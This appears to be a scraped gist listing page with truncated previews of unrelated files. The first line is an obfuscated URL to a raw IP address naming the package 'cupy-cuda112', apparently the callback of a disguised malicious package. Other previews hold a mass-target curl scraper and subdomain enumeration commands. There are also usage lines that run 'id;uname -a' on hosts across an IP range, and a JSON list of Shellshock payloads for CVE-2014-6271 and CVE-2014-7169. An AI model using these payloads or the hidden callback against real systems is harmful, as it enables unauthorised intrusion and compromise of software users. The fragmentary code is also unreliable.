url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
import requests | |
import urllib3 | |
from requests.exceptions import Timeout | |
urllib3.disable_warnings() | |
if sys.argv[1]: | |
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$targets = array_unique(explode("\n",file_get_contents("posts.targets"))); | |
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'; | |
foreach ($targets as $key => $url_target) { | |
#REQUEST PEGANDO ID | |
exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp"); | |
#GREP ID |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from random import shuffle | |
class Cadastro: | |
''' Recebe um cpf e gera um objeto Cadastro que possui um atributo para | |
guardar o ticket definido a partir do cpf passado. | |
''' | |
def __init__(self, cpf): | |
self.ticket = self.ticket_generator(cpf) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s "https://rapiddns.io/subdomain/TARGET?full=1#result" | awk -v RS='<[^>]+>' '/$1/' | sort -u >>TARGET-rapiddns.txt | |
curl -s "https://riddler.io/search/exportcsv?q=pld:TARGET" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-riddler.txt | |
curl -s "https://jldc.me/anubis/subdomains/TARGET" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-jldc.txt | |
curl -s "https://crt.sh/?q=%25.TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u >>TARGET-crt.txt | |
curl -s "https://dns.bufferover.run/dns?q=.TARGET" | jq -r .FDNS_A[] | sed -s 's/,/\\n/g' | sort -u >>TARGET-bufferover.txt | |
cat TARGET-*.txt | sort -u >TARGET.txt;cat TARGET.txt -n |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
self.ui_main.pushButton_BtnDeclarar.clicked.connect(lambda x:self.click_button('DECLARAR')) | |
self.ui_main.pushButton_BtnServico.clicked.connect(lambda x:self.click_button('SERVIÇO')) | |
self.ui_main.pushButton_BtnAssuntos.clicked.connect(lambda x:self.click_button('ASSUNTOS')) | |
self.ui_main.pushButton_BtnAcessoInfo.clicked.connect(lambda x:self.click_button('ACESSO INFO')) | |
self.ui_main.pushButton_BtnComposicao.clicked.connect(lambda x:self.click_button('COMPOSIÇÃO')) | |
self.ui_main.pushButton_BtnConsultaProcessos.clicked.connect(lambda x:self.click_button('CONSULTA PROCESSOS')) | |
self.ui_main.pushButton_BtnCentraisConteudo.clicked.connect(lambda x:self.click_button('CENTRAIS DE CONTEÚDO')) | |
self.ui_main.pushButton_BtnCanaisAtendimento.clicked.connect(lambda x:self.click_button('CANAIS DE ATENDIMENTO')) | |
self.ui_main.pushButton_BtnOndeEncontro.clicked.connect(lambda x:self.click_button('ONDE ENCONTRO')) | |
self.ui_main.pushButton_BtnGovbr.clicked.connect(lambda x:self.click_button('GOV.BR')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl | |
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' | |
python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' | |
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' | |
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"DEFAULT": | |
"() { :; }; echo ; /bin/bash -c '_COMMAND_'", | |
"CVE-2014-6271": | |
"() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'", | |
"CVE-2014-6271-2": | |
"() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'", | |
"CVE-2014-6271-3": | |
"() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;", | |
"CVE-2014-7169": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"config": { | |
"threads": 10, | |
"path": { | |
"path_output": "output/", | |
"path_wordlist": "wordlist/", | |
"path_modules": "modules/", | |
"path_assets": "assets/" | |
}, | |
"files_assets":{ |